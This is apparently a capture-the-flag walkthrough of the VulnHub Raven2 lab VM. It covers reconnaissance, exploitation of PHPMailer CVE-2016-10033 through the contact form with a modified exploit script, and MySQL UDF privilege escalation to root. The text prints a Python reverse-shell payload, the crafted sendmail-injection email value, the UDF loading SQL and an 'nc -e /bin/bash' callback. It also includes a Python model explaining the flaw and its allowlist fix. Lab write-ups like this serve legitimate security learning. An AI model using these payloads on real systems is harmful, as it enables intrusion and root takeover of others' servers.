VulnHub-Raven2

Preface

  This is week 26 of my target-practice series; difficulty: medium. Target VM download

Information gathering

  nmap scan results

22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
45758/tcp open  status  1 (RPC #100024)

  Port 111 is rpcbind (the RPC portmapper) and 45758 is the rpc.statd status service it registers (RPC program 100024); neither gives a foothold here, so on to port 80.
  
  dirsearch scan results

[13:39:27] 200 -   13KB - /about.html
[13:39:47] 200 -    9KB - /contact.php
[13:39:48] 301 -  312B  - /css  ->  http://10.16.122.110/css/
[13:39:55] 301 -  314B  - /fonts  ->  http://10.16.122.110/fonts/
[13:39:58] 301 -  312B  - /img  ->  http://10.16.122.110/img/
[13:39:59] 200 -   16KB - /index.html
[13:40:01] 200 -    4KB - /js/
[13:40:06] 200 -  626B  - /manual/index.html
[13:40:06] 301 -  315B  - /manual  ->  http://10.16.122.110/manual/
[13:40:21] 200 -   16KB - /s.php
[13:40:22] 403 -  301B  - /server-status
[13:40:22] 403 -  302B  - /server-status/
[13:40:35] 200 -    5KB - /vendor/
[13:40:38] 200 -    2KB - /wordpress/wp-login.php
[13:40:38] 200 -   51KB - /wordpress/

  Another classic WordPress install; wpscan turns up nothing. On to the /vendor directory.
  
  Contents of /vendor/PATH:

/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

  That gives the first flag and also leaks the physical path /var/www/html/vendor/, so the document root is /var/www/html/.
  Contents of /vendor/SECURITY.md:

PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com).

PHPMailer versions prior to 5.2.14 (released November 2015) are vulnerable to [CVE-2015-8476](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8476) an SMTP CRLF injection bug permitting arbitrary message sending.

  This tells us the site bundles PHPMailer, and that the bundled version may be one of the vulnerable ones.

  /vendor/VERSION reads 5.2.16, so the site almost certainly runs PHPMailer 5.2.16, which is inside the CVE-2016-10033 range (anything prior to 5.2.18).

  Looking up CVE-2016-10033: it is a flaw in how PHPMailer hands the sender address to the local sendmail binary when mail is sent through PHP's mail(), so a crafted From address can smuggle extra sendmail command-line options. /contact.php hosts a contact form that sends mail, which makes it the entry point.
  
  searchsploit PHPMailer lists the matching exploits.
  
  I picked the Python version: cp /usr/share/exploitdb/exploits/php/webapps/40974.py . Reading through the exploit shows it cannot be used as-is and needs a few edits.

  Set target to the vulnerable page that calls PHPMailer; if exploitation works, the webshell is reachable at http://10.16.122.110/shell.php. In payload, put the IP and port of your listener in the connect() call. In fields, the email value carries the injected sendmail options: its -X argument is changed to /var/www/html/shell.php, and sendmail writes its transcript log, which contains the PHP payload from the name field, to that physical path.

target = 'http://10.16.122.110/contact.php'   # page that calls PHPMailer
backdoor = '/shell.php'                       # URL path the webshell will be served from

# reverse shell; it lands in the sendmail transcript and runs when shell.php is requested
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'10.16.122.31\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        # crafted sender: -X makes sendmail write its transcript into the webroot
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
        'message': 'Pwned'}

  After running python3 40974.py, request /shell.php to check whether the webshell was written.
  
  With the listener running, request shell.php again and the reverse shell comes back.
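  To make the mechanism behind the crafted email value concrete, here is an added Python model of the argument path CVE-2016-10033 abuses. It is my own illustration, not code from 40974.py or from PHPMailer: php_escapeshellcmd() mimics PHP's escapeshellcmd() quote-pairing rule, sendmail_argv() rebuilds the command line the way PHP's mail() hands it to /bin/sh with PHPMailer's sprintf('-f%s', $this->Sender) appended, and is_shell_safe() is an allowlist modelled on (not copied from) the isShellSafe() guard PHPMailer added after the CVE. The two sender addresses are constructed samples; the sendmail path is the Debian default assumed in the comments.

```python
import shlex

# Constructed sample inputs (not captured from the box): the Sender address the
# modified 40974.py submits in the "email" field, and a benign one for contrast.
CRAFTED_SENDER = ('"anarcoder\\" -OQueueDirectory=/tmp '
                  '-X/var/www/html/shell.php server" @protonmail.com')
HONEST_SENDER = 'anarcoder@protonmail.com'

# Characters PHP's escapeshellcmd() backslash-escapes unconditionally.
SHELL_SPECIALS = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellcmd(s: str) -> str:
    """Python model of PHP's escapeshellcmd(): metacharacters get a backslash,
    but a quote that has a matching partner later in the string is passed
    through untouched and only an unpaired quote is escaped.  That pairing rule
    is what lets the crafted address reach the shell with working quotes."""
    out = []
    open_quote = None          # quote kind currently waiting for its partner
    for i, c in enumerate(s):
        if c in SHELL_SPECIALS:
            out.append('\\' + c)
        elif c in '"\'':
            if open_quote is None and s.find(c, i + 1) != -1:
                open_quote = c     # opening quote with a partner: pass through
            elif open_quote == c:
                open_quote = None  # the partner closes the pair
            else:
                out.append('\\')   # lone quote: escape it
            out.append(c)
        else:
            out.append(c)
    return ''.join(out)


def sendmail_argv(sender: str) -> list:
    """How PHPMailer < 5.2.18 reached sendmail via PHP's mail(): the fifth
    mail() argument is sprintf('-f%s', $this->Sender), PHP runs it through
    escapeshellcmd(), appends it to sendmail_path (assumed here to be the
    Debian default '/usr/sbin/sendmail -t -i') and /bin/sh splits the line.
    shlex.split() applies the same POSIX word-splitting rules."""
    cmdline = '/usr/sbin/sendmail -t -i ' + php_escapeshellcmd('-f' + sender)
    return shlex.split(cmdline)


def smuggled_options(sender: str) -> list:
    """Arguments that reach sendmail beyond the single intended -f option."""
    return sendmail_argv(sender)[4:]


def is_shell_safe(sender: str) -> bool:
    """Allowlist modelled on the isShellSafe() guard PHPMailer added after the
    CVE: only ASCII letters, digits and @ _ - . may reach the shell at all."""
    return all((c.isascii() and c.isalnum()) or c in '@_-.' for c in sender)


if __name__ == '__main__':
    for label, sender in (('honest', HONEST_SENDER), ('crafted', CRAFTED_SENDER)):
        print(f'{label}: shell-safe={is_shell_safe(sender)}')
        for arg in sendmail_argv(sender):
            print('   ', arg)
```

  Run it and the crafted sender yields -OQueueDirectory=/tmp and -X/var/www/html/shell.php as separate argv entries: the paired double quotes survive escapeshellcmd(), the shell consumes them, and the embedded spaces split the single -f value into several options. -X tells sendmail to write a transcript of the session, message body included, to that file, and PHP ignores everything outside the <?php ... ?> tags when shell.php is later requested. The allowlist check rejects the address outright, which is why the 5.2.18+ guard works where escaping did not.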
  

Privilege escalation

  The process list shows mysqld running as root, so MySQL UDF privilege escalation is worth trying.
  
  /var/www/html/wordpress/wp-config.php contains the MySQL credentials.
  
  mysql -u root -p with the password R@v3nSecurity connects.

  Because the MySQL version is >= 5.1, the UDF's shared library (.so) has to sit in the MySQL plugin directory before create function can load it.
  Here the plugin directory is /usr/lib/mysql/plugin/, which the following query confirms:

show variables like '%plugin%';

  
  Locate the UDF library

λ locate metasploit-framework|grep data/exploits/mysql
/usr/share/metasploit-framework/data/exploits/mysql
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so

  The target is 64-bit Linux, so lib_mysqludf_sys_64.so is the one to use. Transfer it with nc into /tmp on the target.
  
  Then, inside mysql, run the following to escalate:

use mysql;
create table myfunc(line blob);
insert into myfunc values(load_file('/tmp/lib_mysqludf_sys_64.so'));
# copy /tmp/lib_mysqludf_sys_64.so to /usr/lib/mysql/plugin/lib_mysqludf_sys_64.so:
# www-data cannot write to the plugin directory, so mysqld (running as root) does the copy for us
select * from myfunc into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';

  sys_exec now runs commands as root: select sys_exec('nc 10.16.122.31 1234 -e /bin/bash'); sends a root shell back to Kali.
  
  One small hiccup during the escalation: when I renamed lib_mysqludf_sys_64.so to udf.so, it complained that the file name was too short, yet other people seem to manage that fine. Very odd.
  
